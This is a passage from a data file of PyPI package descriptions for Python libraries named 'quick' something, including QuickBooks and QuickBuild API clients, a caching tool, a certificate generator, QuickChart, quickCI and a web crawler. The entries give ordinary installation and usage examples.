paging:customers=Customer.filter(start_position=1,max_results=25,Active=True,FamilyName=\"Smith\",qb=client)List Filtered by values in list:customer_names=['Customer1','Customer2','Customer3']customers=Customer.choose(customer_names,field=\"DisplayName\",qb=client)List with custom Where Clause (do not include the\"WHERE\"):customers=Customer.where(\"Active = True AND CompanyName LIKE 'S%'\",qb=client)List with custom Where and orderingcustomers=Customer.where(\"Active = True AND CompanyName LIKE 'S%'\",order_by='DisplayName',qb=client)List with custom Where Clause and paging:customers=Customer.where(\"CompanyName LIKE 'S%'\",start_position=1,max_results=25,qb=client)Filtering a list with a custom query (SeeIntuit developer guidefor\nsupported SQL statements):customers=Customer.query(\"SELECT * FROM Customer WHERE Active = True\",qb=client)Filtering a list with a custom query with paging:customers=Customer.query(\"SELECT * FROM Customer WHERE Active = True STARTPOSITION 1 MAXRESULTS 25\",qb=client)Get record count (do not include the\"WHERE\"):customer_count=Customer.count(\"Active = True AND CompanyName LIKE 'S%'\",qb=client)Get single object by Id and update:customer=Customer.get(1,qb=client)customer.CompanyName=\"New Test Company Name\"customer.save(qb=client)Create new object:customer=Customer()customer.CompanyName=\"Test Company\"customer.save(qb=client)Batch OperationsThe batch operation enables an application to perform multiple\noperations in a single request (SeeIntuit Batch Operations Guidefor\nfull details).Batch create a list of objects:fromquickbooks.batchimportbatch_createcustomer1=Customer()customer1.CompanyName=\"Test Company 1\"customer2=Customer()customer2.CompanyName=\"Test Company 2\"customers=[customer1,customer2]results=batch_create(customers,qb=client)Batch update a list of objects:fromquickbooks.batchimportbatch_updatecustomers=Customer.filter(Active=True)# Update customer recordsresults=batch_update(customers,qb=client)Batch delete a list of objects:fromquickbooks.batchimportbatch_deletecustomers=Customer.filter(Active=False)results=batch_delete(customers,qb=client)Review results for batch operation:# successes is a list of objects that were successfully updatedforobjinresults.successes:print(\"Updated \"+obj.DisplayName)# faults contains list of failed operations and associated errorsforfaultinresults.faults:print(\"Operation failed on \"+fault.original_object.DisplayName)forerrorinfault.Error:print(\"Error \"+error.Message)Change Data CaptureChange Data Capture returns a list of objects that have changed since a given time\n(seeChange data capturefor more details):fromquickbooks.cdcimportchange_data_capturefromquickbooks.objectsimportInvoicecdc_response=change_data_capture([Invoice],\"2017-01-01T00:00:00\",qb=client)forinvoiceincdc_response.Invoice:pass# Do something with the invoiceQuerying muliple entity types at the same time:fromquickbooks.objectsimportInvoice,Customercdc_response=change_data_capture([Invoice,Customer],\"2017-01-01T00:00:00\",qb=client)If you use adatetimeobject for the timestamp, it is automatically converted to a string:fromdatetimeimportdatetimecdc_response=change_data_capture([Invoice,Customer],datetime(2017,1,1,0,0,0),qb=client)AttachmentsSeeAttachable documentationfor list of valid file types, file size limits and other restrictions.Attaching a note to a customer:attachment=Attachable()attachable_ref=AttachableRef()attachable_ref.EntityRef=customer.to_ref()attachment.AttachableRef.append(attachable_ref)attachment.Note='This is a note'attachment.save(qb=client)Attaching a file to customer:attachment=Attachable()attachable_ref=AttachableRef()attachable_ref.EntityRef=customer.to_ref()attachment.AttachableRef.append(attachable_ref)attachment.FileName='Filename'attachment._FilePath='/folder/filename'# full path to fileattachment.ContentType='application/pdf'attachment.save(qb=client)Other operationsVoid an invoice:invoice=Invoice()invoice.Id=7invoice.void(qb=client)If your consumer_key never changes you can enable the client to stay running:QuickBooks.enable_global()You can disable the global client like so:QuickBooks.disable_global()Working with JSON dataAll objects includeto_jsonandfrom_jsonmethods.Converting an object to JSON data:account=Account.get(1,qb=client)json_data=account.to_json()Loading JSON data into a quickbooks object:account=Account()account.from_json({\"AccountType\":\"Accounts Receivable\",\"Name\":\"MyJobs\"})account.save(qb=client)Date formattingWhen setting date or datetime fields, Quickbooks requires a specific format.\nFormating helpers are available in helpers.py. Example usage:date_string=qb_date_format(date(2016,7,22))date_time_string=qb_datetime_format(datetime(2016,7,22,10,35,00))date_time_with_utc_string=qb_datetime_utc_offset_format(datetime(2016,7,22,10,35,00),'-06:00')Exception HandlingThe QuickbooksException object contains additionalQBO error codeinformation.fromquickbooks.exceptionsimportQuickbooksExceptiontry:pass# perform a Quickbooks operationexceptQuickbooksExceptionase:e.message# contains the error message returned from QBOe.error_code# contains thee.detail# contains additional information when availableNote:Objects and object property names match their Quickbooks\ncounterparts and do not follow PEP8.Note:This is a work-in-progress made public to help other\ndevelopers access the QuickBooks API. Built for a Django project."} +{"package": "quickbooks-py", "pacakge-description": "Python Library for interfacing with Quickbooks Accounting API v3 found athttps://developer.intuit.com/docs/api/accountingFree software: ISC licenseHistory0.1.3 (2015-09-27)First release on PyPI.0.1.4 (2015-10-15)Updated requests library0.2.0 (2016-01-23)Added an api to disconnect from quickbooks0.2.1 (2016-01-23)Making Resource name case insensitive0.2.2 (2016-02-19)Bugfix in parsing query response when the response is empty"} +{"package": "quickbooks-python", "pacakge-description": "UNKNOWN"} +{"package": "quickbuild", "pacakge-description": "Package supports sync and async syntax with same code base.fromquickbuildimportAsyncQBClient,QBClientDocumentationPackage Read the DocsOfficial REST API documentationAvailable REST API ClientsInstallationpip3installquickbuildExamplesGet server version:fromquickbuildimportQBClientclient=QBClient('https://server','user','password')version=client.system.get_version()print(version)Get server version in async way (be carefulAsyncQBClientmust be called inside async function):importasynciofromquickbuildimportAsyncQBClientasyncdefmain():client=AsyncQBClient('https://server','user','password')version=awaitclient.system.get_version()print(version)awaitclient.close()asyncio.run(main())Stop build:fromquickbuildimportQBClientclient=QBClient('https://server','user','password')client.builds.stop(123)Update credentials handler:importasyncioimportaiohttpfromquickbuildimportAsyncQBClientasyncdefget_credentials():asyncwithaiohttp.ClientSession()assession:asyncwithsession.get('...')asresp:response=awaitresp.json()returnresponse['user'],response['password']asyncdefmain():client=AsyncQBClient('http://server','user','password',auth_update_callback=get_credentials)# let's suppose credentials are valid nowprint(awaitclient.builds.get_status(12345))# now, after some time, password of user somehow changed, so our callback# will be called, new credentials will be using for retry and future here# we get also correct build info instead of QBUnauthorizedError exceptionprint(awaitclient.builds.get_status(12345))awaitclient.close()asyncio.run(main())Content typeBy default QuickBuild returns XML content, but starting from 10 version it also\nhas native support of JSON content, usually it\u2019s much more convenient to use\nnative Python types (parsed XML) instead of pure XML string.So, that is why three types of content were indtoduced, this type and behavior\ncan be set globally for client instances, and can be rewritten for some methods.PARSE (using by default)GET: parse XML to native Python types.POST: pure XML string.XMLGET: return native XML without any transformations.POST: pure XML string.JSON (QuickBuild 10+)GET: parsed JSON string.POST: dumps object to JSON string.DevelopmentIt\u2019s possible to run QuickBuild community edition locally using docker:Build locally:dockerbuild.-fdocker/QB10.Dockerfile-tquickbuild:10dockerrun--restartalways--nameqb10-d-p8810:8810quickbuild:10Or run prepared image:dockerrun--restartalways--nameqb10-d-p8810:8810pbelskiy/quickbuild:10Then openhttp://localhost:8810/TestingPrerequisites:toxThen just run tox, all dependencies and checks will run automaticallytoxContributingFeel free for any contributions."} +{"package": "quickcache", "pacakge-description": "No description available on PyPI."} +{"package": "quick-cache", "pacakge-description": "A quick and easy to use python caching system.You can installquick_cacheviapipinstall--userquick_cacheand import it in python using:fromquick_cacheimportQuickCacheCreate the cache object as follows:defmsg(message,*args,**kwargs):print(message.format(*args,**kwargs),file=sys.stderr)cache=QuickCache(base_file,quota=500,ram_quota=100,warnings=msg)wherebase_fileis an optional file whosecontentinvalidates the\ncache (ie., when the content of the file changes the cache is\ninvalidated; for large files it might be desirable to use themtimein\nthe cache object below) andmsgis an optional formatting function\nthat prints warnings (by default it\u2019sNonewhich doesn\u2019t print\nanything; warnings are emitted when the actual computation is faster\nthan reading the results from the cache or if other exceptional\nsituations occur).quotaandram_quotaare optional maximal\ncache sizes, both in RAM and on disk, in MB.The caching functionality can then be used via:withcache.get_hnd({# object identifying the task to cache# can be any combination of keys and values\"param_a\":5,\"input_file_c\":os.path.getmtime(input_file_c),# for file change time...})ashnd:ifnothnd.has():res=hnd.write(do_compute())# compute your result hereelse:res=hnd.read()# your result is in resThe cache object used for creating the handle uniquely defines the task.\nThe object should contain all parameters of the task and the task\ncomputation itself should be deterministic."} +{"package": "quickcal", "pacakge-description": "QUICK CALCULATIONThis library will help to calculate numbers quickly.How to install?'''\npip install quickcal\n'''initializing package'''\nfrom quickcal import QuickCalnum_1 = 16\nnum_2 = 8cal = QuickCal(num_1, num_2)\n'''for addition'''\ncal.addition()\n'''for substraction'''\ncal.substraction()\n'''for multiplication'''\ncal.multiplication()\n'''for division'''\ncal.division()\n'''"} +{"package": "quickcalc", "pacakge-description": "Quick CalcThis package will help you Calculate Numbers Quickly.How to Install it?On Windowspip install quickcalcOn Linux:sudo pip3 install quickcalcHow to use it?Initializing Packagefrom quickcalc import QuickCalc\n\nnum_1 = 8\nnum_2 = 1\n\ncalc = QuickCalc(num_1, num_2)Adding Numberscalc.addition()Substracting Numberscalc.substraction()Multiplying Numberscalc.multiplication()Dividing Numberscalc.division()"} +{"package": "quickcalculator", "pacakge-description": "No description available on PyPI."} +{"package": "quick-cd", "pacakge-description": "Quick cdQuick cd is little tool allowing you to save any directory under a label, so you can quickly cd into it with out giving whole path.Instalationpip install quick-cdUsageTo save current location under label \"my_location\" useqcd -c my_locationYou can also, specify relative or absolute path, to save it instead of current directory.qcd -c my_location ../different_dirTo cd into saved location, simply give label without any additional argumentsqcd my_locationTo remove previously saved location useqcd -d labelTo list all saved locationsqcd -l"} +{"package": "quickcerts", "pacakge-description": "quickcertsQuick and easy X.509 certificate generator for SSL/TLS utilizing local PKI:heart: :heart: :heart:You can say thanks to the author by donations to these wallets:ETH:0xB71250010e8beC90C5f9ddF408251eBA9dD7320eBTC:Legacy:1N89PRvG1CSsUk9sxKwBwudN6TjTPQ1N8aSegwit:bc1qc0hcyxc000qf0ketv4r44ld7dlgmmu73rtlntwFeaturesEasy to use.Genarates both client and server certificates.Produces certificates with proper attributes (Key Usage, Extended Key Usage, Authority Key Identifier, Subject Key Identifier and so on).Supports certificates with multiple domain names (SAN, SubjectAlternativeName).Supports wildcard certificates.Generates PKCS12 (.pfx, .p12) as wellRequirementsPython 3.4+cryptography 1.6+InstallationFrom sourceRun this command within source directory:pip3install.From PyPIpip3installquickcertsSnap StoresudosnapinstallquickcertsDockerFor deployment with Docker see \"Docker\" section below.Usage examplequickcerts-D*.example.comexample.com-Dwww.example2.comexample2.commx.example2.com-C\"John Doe\"-C\"Jane Doe\"quickcerts-Dlocalhost127.0.0.1These commands will produce following files in current directory:CA certificate and keyTwo server certificates having multiple DNS names or IP addresses in SubjectAlternativeName fields and keys for that certificates.Two client certificates for CN=\"John Doe\" and CN=\"Jane Doe\" (and keys for them).Consequent invokations will reuse created CA.DockerAlso you may run this application with Docker:dockerrun-it--rm-v\"$(pwd)/certs:/certs\"\\yarmak/quickcerts-Dserver-Cclient1-Cclient2-Cclient3In this example CA and certificates will be created in./certsdirectory.Synopsis$ quickcerts --help\nusage: quickcerts [-h] [-o OUTPUT_DIR] [-k KEY_SIZE] [--kdf-rounds KDF_ROUNDS]\n [-D DOMAINS [DOMAINS ...]] [-C CLIENT] [-P PASSWORD]\n\nGenerate RSA certificates signed by common self-signed CA\n\noptions:\n -h, --help show this help message and exit\n -o OUTPUT_DIR, --output-dir OUTPUT_DIR\n location of certificates output (default: .)\n -k KEY_SIZE, --key-size KEY_SIZE\n RSA key size used for all certificates (default: 2048)\n --kdf-rounds KDF_ROUNDS\n number of KDF rounds (default: 50000)\n -D DOMAINS [DOMAINS ...], --domains DOMAINS [DOMAINS ...]\n Generate server certificate which covers following\n domains or IP addresses delimited by spaces. First one\n will be set as CN. Option can be used multiple times.\n (default: None)\n -C CLIENT, --client CLIENT\n Generate client certificate with following name.\n (default: None)\n -P PASSWORD, --password PASSWORD\n password for newly generated .pfx files (default:\n password)"} +{"package": "quickchart", "pacakge-description": "QuickChart Python library=========QuickChart is a lightweight library for drawing graphs and tables using just (http://www.pythonware.com/products/pil/ \"PIL\")."} +{"package": "quickchart-io", "pacakge-description": "quickchart-pythonA Python client for thequickchart.ioimage charts web service.InstallationUse thequickchart.pylibrary in this project, or install throughpip:pip install quickchart.ioUsageThis library provides aQuickChartclass. Import and instantiate it. Then set properties on it and specify aChart.jsconfig:fromquickchartimportQuickChartqc=QuickChart()qc.width=500qc.height=300qc.config={\"type\":\"bar\",\"data\":{\"labels\":[\"Hello world\",\"Test\"],\"datasets\":[{\"label\":\"Foo\",\"data\":[1,2]}]}}Useget_url()on your quickchart object to get the encoded URL that renders your chart:print(qc.get_url())# https://quickchart.io/chart?c=%7B%22chart%22%3A+%7B%22type%22%3A+%22bar%22%2C+%22data%22%3A+%7B%22labels%22%3A+%5B%22Hello+world%22%2C+%22Test%22%5D%2C+%22datasets%22%3A+%5B%7B%22label%22%3A+%22Foo%22%2C+%22data%22%3A+%5B1%2C+2%5D%7D%5D%7D%7D%7D&w=600&h=300&bkg=%23ffffff&devicePixelRatio=2.0&f=pngIf you have a long or complicated chart, useget_short_url()to get a fixed-length URL using the quickchart.io web service (note that these URLs only persist for a short time unless you have a subscription):print(qc.get_short_url())# https://quickchart.io/chart/render/f-a1d3e804-dfea-442c-88b0-9801b9808401The URLs will render an image of a chart:Using Javascript functions in your chartChart.js sometimes relies on Javascript functions (e.g. for formatting tick labels). There are a couple approaches:Build chart configuration as a string instead of a Python object. Seeexamples/simple_example_with_function.py.Build chart configuration as a Python object and include a placeholder string for the Javascript function. Then, find and replace it.Use the providedQuickChartFunctionclass. Seeexamples/using_quickchartfunction.pyfor a full example.A short example usingQuickChartFunction:qc=QuickChart()qc.config={\"type\":\"bar\",\"data\":{\"labels\":[\"A\",\"B\"],\"datasets\":[{\"label\":\"Foo\",\"data\":[1,2]}]},\"options\":{\"scales\":{\"yAxes\":[{\"ticks\":{\"callback\":QuickChartFunction('(val) => val + \"k\"')}}],\"xAxes\":[{\"ticks\":{\"callback\":QuickChartFunction('''function(val) {return val + '???';}''')}}]}}}print(qc.get_url())Customizing your chartYou can set the following properties:config: dict or strThe actual Chart.js chart configuration.width: intWidth of the chart image in pixels. Defaults to 500height: intHeight of the chart image in pixels. Defaults to 300format: strFormat of the chart. Defaults to png. svg is also valid.background_color: strThe background color of the chart. Any valid HTML color works. Defaults to #ffffff (white). Also takes rgb, rgba, and hsl values.device_pixel_ratio: floatThe device pixel ratio of the chart. This will multiply the number of pixels by the value. This is usually used for retina displays. Defaults to 1.0.version: strThe version of Chart.js to use. Acceptable values are documentedhere. Usually used to select Chart.js 3+.hostOverride the host of the chart render server. Defaults to quickchart.io.keySet an API key that will be included with the request.Getting URLsThere are two ways to get a URL for your chart object.get_url(): strReturns a URL that will display the chart image when loaded.get_short_url(): strUses the quickchart.io web service to create a fixed-length chart URL that displays the chart image. Returns a URL such ashttps://quickchart.io/chart/render/f-a1d3e804-dfea-442c-88b0-9801b9808401.Note that short URLs expire after a few days for users of the free service. You cansubscribeto keep them around longer.Other functionalityget_bytes()Returns the bytes representing the chart image.to_file(path: str)Writes the chart image to a file path.More examplesCheckout theexamplesdirectory to see other usage."} +{"package": "quickci", "pacakge-description": "quickCIHave a quick look at the status of CI projects from the command line.Free software: MIT licenseDocumentation:https://quickci.readthedocs.ioGitHub repo:https://github.com/robertopreste/quickciFeaturesquickCI allows to have a quick overview of the status of build jobs on several CI services, for a specific branch of the repository being built.\nCurrently, quickCI supports checking build status for the following CI services:Travis CICircleCIAppVeyorBuddyDroneMore services to come!UsageConfigurationCreate a config file (it will be located in~/.config/quickci/tokens.json):$ quickci config createReplace placeholders with your own authentication tokens:$ quickci config update Available services are:Travis CI:travisCircleCI:circleAppVeyor:appveyorBuddy:buddyDrone:droneCheck that everything is correct:$ quickci config showCheck build statusCheck the build status of your projects:$ quickci statusThe build status of your Travis CI, CircleCI, AppVeyor, Buddy and Drone projects will be returned (masterbranch).\nIf you want to monitor one specific branch of your repositories (suppose you have many repos with a dedicateddevbranch for development), you can easily add the--branchoption:$ quickci status --branch devIf the--branchoption is not provided, the build status of themasterbranch will be retrieved by default.If you want to check one specific repository, you can provide the--repooption:$ quickci status --repo my_repoIt is obviously possible to combine the--repoand--branchoptions to check a given branch of a specific repository.It is also possible to check a specific service using subcommands ofquickci status:$ quickci status travis\n$ quickci status circle\n$ quickci status appveyor\n$ quickci status buddy\n$ quickci status droneThese subcommands also accept the--branchand--repooptions.\nIf the token for a specific service is not listed in~/.config/quickci/tokens.json, it is possible to provide it using the--tokenoption:$ quickci status travis --token Please refer to theUsagesection of the documentation for further information.InstallationquickCI can be installed using pip (Python>=3.6 only):$ pip install quickciPlease refer to theInstallationsection of the documentation for further information.CreditsThis package was created withCookiecutterand thecc-pypackageproject template.History0.1.0 (2019-04-20)First release.0.1.1 (2019-04-29)Update Config methods and attributes for better handling of tokens;Update CLI commands.0.1.2 (2019-06-03)Minor code fix;Update requirements and documentation;Fix AppVeyor request class and add GitLab draft.0.1.3 (2019-06-06)Add Buddy class.0.1.4 (2019-06-07)Change fetching functions to asyncio.0.2.0 (2019-07-02)Changeconfigandstatuscommands to group commands and add related subcommands;Change classes to use concurrent functions when possible;Clean code.0.2.1 (2019-07-03)Fix imports and tox test config.0.2.2 (2019-07-03)Fix setup.py installation process;Update documentation.0.2.3 (2019-07-13)Add Drone CI class and CLI commands;Update tests;Update documentation.0.3.0 (2019-07-28)Add--branchoption to check for specific branch;Update documentation.0.4.0 (2019-12-12)Add--repooption to check for a specific repository;Update documentation."} +{"package": "quick-cli", "pacakge-description": "Quick CLIThe Quick CLI lets you manage your Quick instance.\nFor more information on how to work with it, see ouruser guide.Set upThe CLI is a Python project and you can install via pip:pipinstallquick-cliThe first step after installing the CLI is creating a new context.\nOuruser guideprovides further information.ReferenceThere is alist of all commandsas a reference.\nAdditionally, you can run all commands with-hor--helpto display a help message.ContributingTheCLI's developer guideprovides more information on how to setup the project and the project's layout.\nFor general information, check out out thecontributing guide."} +{"package": "quick-clojure", "pacakge-description": "quick-------------------Run clojure scripts and lein commands quickly using a persistent nREPL session.Links`````* `development version `_"} +{"package": "quickclone", "pacakge-description": "QuickCloneCommand line utility for quickly cloning remote SCM repositories as succintly as possible.This project is a prime example of spending 24 hours to save 2 seconds.NotesCurrently, only git is supported. I might add mercurial and then subversion\nlater.InstallationFrom source:gitclonehttps://github.com/RenoirTan/QuickClone.gitcdQuickClone\npipinstall.FromPYPI:pipinstallquickcloneBoth ways should installqklnandquickcloneto PATH, meaning you don't have\nto call quickclone usingpython -m quickclone.qklnandquickcloneare\nboth entry points to the samemainfunction, so you can call either command.ConfigurationYou can configure QuickClone by editing~/.config/quickclone.toml.ExamplesqklnRenoirTan/QuickCloneIfoptions.local.remotes_diris defined, QuickClone will clone the repo into\na folder in that directory. For example, ifoptions.local.remotes_diris\ndefined as~/Code/remote, the repo will be cloned to~/Code/remote/github.com/RenoirTan/QuickClone.You can also overrideoptions.local.remotes_dirby specifying the destination\npath or adding the-Idflag to the command.qklnRenoirTan/QuickClone~/Desktop/destinationqklnRenoirTan/QuickClone-IdIn the latter example, QuickClone will ignoreoptions.local.remotes_dirand\nclone to./QuickClone.After cloning the remote repository, QuickClone will save where the repository\nwas cloned to locally in a cache file. You can then use this command to see\nwhere the last repository was cloned to:qkln-Land then cd into that directory:cd$(qkln-L)"} +{"package": "quickcloud", "pacakge-description": "No description available on PyPI."} +{"package": "quickcnn", "pacakge-description": "Main idea of QuickCNN is to train deep ConvNet without diving into architectural details. QuickCNN works as an interactive tool for transfer learning, finetuning, and scratch training with custom datasets. It has pretrained model zoo and also works with your custom keras model architecture."} +{"package": "quickconf", "pacakge-description": "quickconfSimple and flexible TOML-file based configurations frameworkIfTOML Kitis installed,quickconfwill use that and supports both reading and writing configuration files. Iftomlkitis not available,quickconfwill use the Python system librarytomllibbut will support only reading of configuration files.Installquickconfwith optional dependencysaveto ensuretomlkitis also installed:pip install quickconf[save]"} +{"package": "quickconfig", "pacakge-description": "UNKNOWN"} +{"package": "quick-config", "pacakge-description": "QuickConfigDescriptionQuickConfig is a super lightweight dynamic config provider for python applications.\nThe config provider uses a runtime config that can be imported to any part of your\napplication.quick_configparses and loads your environment configs only once\nbased on the runtime environment, and the built configs can be imported anywhere\nin your application!FeaturesBuilds modular configs which overwrite a base config based on the config required\nfor the application run time environment. Ex: thebaseconfig will be overwritten\nby thedevelopmentconfig if the app is running in thelocalordevelopmentruntime environment.Has a built-in API for queryable environment flags likeconfig.is_dev()orconfig.is_prod()for environment specific code pathsCreates a simple logger with a console and file handler at application run time\nwhich can be used anywhere in the application after importing thequick_configconfig.Creates callable methods on the globally loadedconfigobject which mirror the\nnames of the configs allowing engineers to call the methods in the app for their values\ninstead of doing config lookupsAllows for indexable accessors to configs which are collections. I.e., lists, tuples\nor maps/dictionariesInstallation$>pipinstallquick_configDesignThe quick config provider relies on a standard structure for an application's\nconfigurations. All configurations must be provided in aconfigdirectory.\nConfigs in theconfigdirectory must follow the standard deployment configuration\nnames likestaging.pyortest.pyorproduction.py. Once the runtime environment\nis set via an environment variable calledenvironment, the config provider will read\nthat and populate the configs available to the entire application as callable methods\nwhich can also be indexed if the provided congig is a collection (list,\ntuple, or map).UsageCreate an application like a Django/Flask Application which has runtime configs which may\ndiffer for each run time environment using the following nomenclature:create a directory calledconfigcreate files in the directory with the following structure# config/base.py:importosENV_VARS={\"some_api_key\":os.environ.get('my_api_key'),\"db_name\":\"my_default_db\",\"db_driver\":\"inmemory_sqlite\",\"important_array\":['a','b','c','d']}# config/production.py:importosENV_VARS={\"db_name\":os.environ.get(\"production_db\"),# overwrites base.py\"db_driver\":\"mysql\",\"important_array\":[1,2,3,4]# overwrites base.py}# config/development.py:ENV_VARS={\"db_name\":\"my_dev_db\",}Note the use ofENV_VARSin each environment file. That is requiredInstall thequick_configpackagepip install quick_configUse the environment vars in your application directly:# in my_app/my_module/file.pyfromquick_configimportconfigclassMyModule:def__init__(self):self.logger=config.get_logger()self.api_key=config.some_api_key()# depending on environment, this will changeself.important_index_value=config.important_array(0)db_connection_info={\"db_name\":config.db_name(),\"driver\":config.driver(),}"} +{"package": "quick-connect", "pacakge-description": "No description available on PyPI."} +{"package": "quickcpp", "pacakge-description": "quickcppquickcppis a small command-line tool to quickly build and run a single C++ file. Handy for quick experimentations.UsageThe simplest usage isquickcpp . When called like this,quickcppbuilds the file (producing aa.outfile) and runs the result.$ cat examples/helloworld.cpp \n#include \n\nint main(int argc, char** argv) {\n std::cout << \"Hello world!\\n\";\n return 0;\n}\n\n$ quickcpp examples/helloworld.cpp \n- Building ---------------------\nc++ examples/helloworld.cpp -Wall -fPIC -std=c++17 -g\n- Running ----------------------\nHello world!Using other librariesWant to experiment something withQtWidgets? You can specify any installed pkg-config compliant packages using-p :$ cat examples/qt.cpp \n#include \n#include \n\nint main(int argc, char** argv) {\n QApplication app(argc, argv);\n\n QMainWindow window;\n window.setWindowTitle(\"Hello World\");\n window.show();\n\n return app.exec();\n}\n\n$ quickcpp -p Qt5Widgets examples/qt.cpp \n- Building ---------------------\nc++ examples/qt.cpp -Wall -fPIC -std=c++17 -g -DQT_WIDGETS_LIB -DQT_GUI_LIB -DQT_CORE_LIB -I/usr/include/x86_64-linux-gnu/qt5/QtWidgets -I/usr/include/x86_64-linux-gnu/qt5 -I/usr/include/x86_64-linux-gnu/qt5/QtGui -I/usr/include/x86_64-linux-gnu/qt5 -I/usr/include/x86_64-linux-gnu/qt5/QtCore -I/usr/include/x86_64-linux-gnu/qt5 -lQt5Widgets -lQt5Gui -lQt5Core\n- Running ----------------------You should see a window like this one:Any package listed bypkg-config --list-allcan be used byquickcpp.Live reloadquickcppcan useentrto automatically rebuild and rerun your file. Just installentrand runquickcppwith the-lflag.InstallationThe recommended solution is to usepipx:pipx install quickcppBut you can also install it withpip:pip install --user quickcppLicenseApache 2.0"} +{"package": "quick-crawler", "pacakge-description": "Quick CrawlerA toolkit for quickly performing crawler functionsInstallationpip install quick-crawlerFunctionsget a html page and can save the file if the file path is assigned.get a json object from html stringget or download a series of url with similar format, like a page listremove unicode strget json object onlineread a series of obj from a json list onlinequick save csv file from a list of json objectsquick read csv file to a list of fieldsquick download a filequick crawler of a series of multi-lang websitesLet Codes SpeakExample 1:fromquick_crawler.pageimport*if__name__==\"__main__\":# get a html page and can save the file if the file path is assigned.url=\"https://learnersdictionary.com/3000-words/alpha/a\"html_str=quick_html_page(url)print(html_str)# get a json object from html stringhtml_obj=quick_html_object(html_str)word_list=html_obj.find(\"ul\",{\"class\":\"a_words\"}).findAll(\"li\")print(\"word list: \")forwordinword_list:print(word.find(\"a\").text.replace(\" \",\"\").strip())# get or download a series of url with similar format, like a page listurl_range=\"https://learnersdictionary.com/3000-words/alpha/a/{pi}\"list_html_str=quick_html_page_range(url_range,min_page=1,max_page=10)foridx,htmlinenumerate(list_html_str):html_obj=quick_html_object(html)word_list=html_obj.find(\"ul\",{\"class\":\"a_words\"}).findAll(\"li\")list_w=[]forwordinword_list:list_w.append(word.find(\"a\").text.replace(\" \",\"\").strip())print(f\"Page{idx+1}: \",','.join(list_w))Example 2:fromquick_crawler.pageimport*if__name__==\"__main__\":# remove unicode stru_str='a\u00e0\\xb9'u_str_removed=quick_remove_unicode(u_str)print(\"Removed str: \",u_str_removed)# get json object onlinejson_url=\"http://soundcloud.com/oembed?url=http%3A//soundcloud.com/forss/flickermood&format=json\"json_obj=quick_json_obj(json_url)print(json_obj)forkinjson_obj:print(k,json_obj[k])# read a series of obj from a json list onlinejson_list_url=\"https://jsonplaceholder.typicode.com/posts\"json_list=quick_json_obj(json_list_url)print(json_list)forobjinjson_list:userId=obj[\"userId\"]title=obj[\"title\"]body=obj[\"body\"]print(obj)# quick save csv file from a list of json objectsquick_save_csv(\"news_list.csv\",['userId','id','title','body'],json_list)# quick read csv file to a list of fieldslist_result=quick_read_csv(\"news_list.csv\",fields=['userId','title'])print(list_result)# quick download a filequick_download_file(\"https://www.englishclub.com/images/english-club-C90.png\",save_file_path=\"logo.png\")Example 3: obtain html text from the Browserfromquick_crawlerimportbrowserimportosif__name__==\"__main__\":html_str=browser.get_html_str_with_browser(\"https://pypi.org/project/quick-crawler/0.0.2/\",driver_path='../../examples/browsers/chromedriver.exe')print(html_str)Example 4: Crawl a series of web pages from a group of websitesfromquick_crawlerimportbrowserimportoslist_item=[['CNN','https://edition.cnn.com/'],['AP','https://apnews.com/']]current_path=os.path.dirname(os.path.realpath(__file__))browser.fetch_meta_info_from_sites(list_item,current_path+\"/data\",is_save_fulltext=True,use_plain_text=True)Example 5: Crawl a series of websites with advanced settingsfromquick_crawlerimportpage,browserimportosimportpicklelist_item=pickle.load(open(\"list_news_site.pickle\",\"rb\"))[20:]current_path=os.path.dirname(os.path.realpath(__file__))browser.fetch_meta_info_from_sites(list_item,current_path+\"/news_data1\",is_save_fulltext=True,use_plain_text=False,max_num_urls=100,use_keywords=True)list_model=browser.summarize_downloaded_data(\"news_data1\",# save_path=\"news_data_list.csv\")Example 6: Multi-lang crawlerimportosfromquick_crawler.multilangimportget_sites_with_multi_lang_keywordskeywords=\"digital economy\"init_urls=[[\"en-cnn\",\"https://edition.cnn.com/\"],['jp-asahi','https://www.asahi.com/'],['ru-mk','https://www.mk.ru/'],['zh-xinhuanet','http://xinhuanet.com/'],]current_path=os.path.dirname(os.path.realpath(__file__))list_item=get_sites_with_multi_lang_keywords(init_urls=init_urls,src_term=keywords,src_language=\"en\",target_langs=[\"ja\",\"zh\",\"es\",\"ru\"],save_data_folder=f\"{current_path}/news_data3\")Example 7: get multiple translations based on a keywordimportpicklefromquick_crawler.languageimport*terms='digital economy'dict_lang=get_lang_dict_by_translation(\"en\",terms)pickle.dump(dict_lang,open(f\"multi-lang-{terms}.pickle\",'wb'))Example 8: Pipeline for web page list processingfromquick_crawler.pipline.page_listimportrun_web_list_analysis_shellif__name__==\"__main__\":deffind_list(html_obj):returnhtml_obj.find(\"div\",{\"class\":\"bd\"}).findAll(\"li\")defget_item(item):datetime=item.find(\"span\").texttitle=item.find(\"a\").texturl=item.find(\"a\")[\"href\"]returntitle,url,datetimerun_web_list_analysis_shell(url_pattern=\"https://www.abc.com/index_{p}.html\",working_folder='test',min_page=1,max_page=2,fn_find_list=find_list,fn_get_item=get_item,tag='xxxx')LicenseThequick-crawlerproject is provided byDonghua Chen."} +{"package": "quickcss", "pacakge-description": "quickCSSQuick Cern Software Setup (QuickCSS)Getting startedTo make it easy for you to get started with GitLab, here's a list of recommended next steps.Already a pro? Just edit this README.md and make it your own. Want to make it easy?Use the template at the bottom!Add your filesCreateoruploadfilesAdd files using the command lineor push an existing Git repository with the following command:cd existing_repo\ngit remote add origin https://gitlab.cern.ch/clcheng/quickcss.git\ngit branch -M master\ngit push -uf origin masterIntegrate with your toolsSet up project integrationsCollaborate with your teamInvite team members and collaboratorsCreate a new merge requestAutomatically close issues from merge requestsEnable merge request approvalsAutomatically merge when pipeline succeedsTest and DeployUse the built-in continuous integration in GitLab.Get started with GitLab CI/CDAnalyze your code for known vulnerabilities with Static Application Security Testing(SAST)Deploy to Kubernetes, Amazon EC2, or Amazon ECS using Auto DeployUse pull-based deployments for improved Kubernetes managementSet up protected environmentsEditing this READMEWhen you're ready to make this README your own, just edit this file and use the handy template below (or feel free to structure it however you want - this is just a starting point!). Thank you tomakeareadme.comfor this template.Suggestions for a good READMEEvery project is different, so consider which of these sections apply to yours. The sections used in the template are suggestions for most open source projects. Also keep in mind that while a README can be too long and detailed, too long is better than too short. If you think your README is too long, consider utilizing another form of documentation rather than cutting out information.NameChoose a self-explaining name for your project.DescriptionLet people know what your project can do specifically. Provide context and add a link to any reference visitors might be unfamiliar with. A list of Features or a Background subsection can also be added here. If there are alternatives to your project, this is a good place to list differentiating factors.BadgesOn some READMEs, you may see small images that convey metadata, such as whether or not all the tests are passing for the project. You can use Shields to add some to your README. Many services also have instructions for 